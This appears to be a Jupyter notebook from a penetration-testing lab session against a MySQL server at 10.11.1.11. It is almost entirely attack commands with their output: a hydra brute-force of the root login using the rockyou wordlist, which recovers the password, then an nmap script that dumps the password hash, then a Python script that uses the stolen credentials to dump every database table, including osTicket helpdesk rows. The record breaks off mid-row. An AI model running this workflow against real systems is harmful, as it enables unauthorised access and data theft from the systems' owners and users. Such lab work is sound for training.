In [10]:
target = open('00_target.txt').read()
%env TARGET={target}

env: TARGET=10.11.1.11


In [11]:
# %env PL=/usr/share/wordlists/SecLists/Passwords/probable-v2-top207.txt
%env PL=~/hax/SecLists/Passwords/probable-v2-top1575.txt
%env PLRY=/usr/share/wordlists/rockyou.txt

%env UL=~/hax/SecLists/Usernames/Names/names.txt
%env UL_S=/usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt

%env USER=root

env: PL=~/hax/SecLists/Passwords/probable-v2-top1575.txt
env: PLRY=/usr/share/wordlists/rockyou.txt
env: UL=~/hax/SecLists/Usernames/Names/names.txt
env: UL_S=/usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt
env: USER=root


In [12]:
%%writefile custom_users.txt
root
admin

Overwriting custom_users.txt


In [13]:
!echo hydra -I -l root -P $PLRY -u -f $TARGET mysql
!echo
!hydra -I -l root -P $PLRY -u -f $TARGET mysql

hydra -I -l root -P /usr/share/wordlists/rockyou.txt -u -f 10.11.1.11 mysql

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-27 13:10:31
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://10.11.1.11:3306/
[3306][mysql] host: 10.11.1.11   login: root   password: 987654321
[STATUS] attack finished for 10.11.1.11 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-27 13:10:47


In [4]:
!hydra -I -l root -P $PL -u -f $TARGET mysql

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-27 11:55:00
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[ERROR] File for passwords not found: ~/hax/SecLists/Passwords/probable-v2-top1575.txt


In [ ]:
!hydra -I -L custom_users.txt -P $PLRY -u -f $TARGET mysql

In [14]:
!nmap -p 3306 $TARGET --script mysql-dump-hashes --script-args='username=root,password=987654321'

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-27 13:30 PDT
Nmap scan report for 10.11.1.11
Host is up (0.064s latency).

PORT     STATE SERVICE
3306/tcp open  mysql
| mysql-dump-hashes: 
|_  root:*DABCF719388B72AD432DE5E88423B56D652DD8B0

Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds


In [5]:
%pip install mysql mysql-connector-python-rf

     |████████████████████████████████| 11.9 MB 6.1 MB/s eta 0:00:01
  Created wheel for mysql-connector-python-rf: filename=mysql_connector_python_rf-2.2.2-cp39-cp39-linux_aarch64.whl size=249455 sha256=1ccce2d8ed17ce7421d91b0f7804af7e681ffe7495a991f5232a4dac281c431f
  Stored in directory: /home/parallels/.cache/pip/wheels/64/06/5b/ef9543936a3f5de15b02775b6ae548a09f3ed2319d20342771
Successfully built mysql-connector-python-rf
Note: you may need to restart the kernel to use updated packages.


In [13]:
import mysql.connector
 
mydb = mysql.connector.connect(host="10.11.1.11", user="root", password="987654321")
 
mycursor = mydb.cursor()
mycursor.execute("show databases;")
 
for database in mycursor.fetchall():
    print(database)
    if 'information_schema' in database:
        continue
    mycursor.execute("use %s;" % database)
    
    mycursor.execute("show tables;")

    for table in mycursor.fetchall():
        print("\t", table)
        mycursor.execute("SELECT * FROM %s;" % table)
        for row in mycursor.fetchall():
            print("\t\t", row)

('information_schema',)
('helpdesk',)
	 ('ost__search',)
		 ('H', 1, 'osTicket Installed!', "Thank you for choosing osTicket. Please make sure you join the osTicket forums and our mailing list to stay up to date on the latest news, security alerts and updates. The osTicket forums are also a great place to get assistance, guidance, tips, and help from other osTicket users. In addition to the forums, the osTicket wiki provides a useful collection of educational materials, documentation, and notes from the community. We welcome your contributions to the osTicket community. If you are looking for a greater level of support, we provide professional services and commercial support with guaranteed response times, and access to the core development team. We can also help customize osTicket or even add new features to the system to meet your unique needs. If the idea of managing and upgrading this osTicket installation is daunting, you can try osTicket as a hosted service at http://www.supports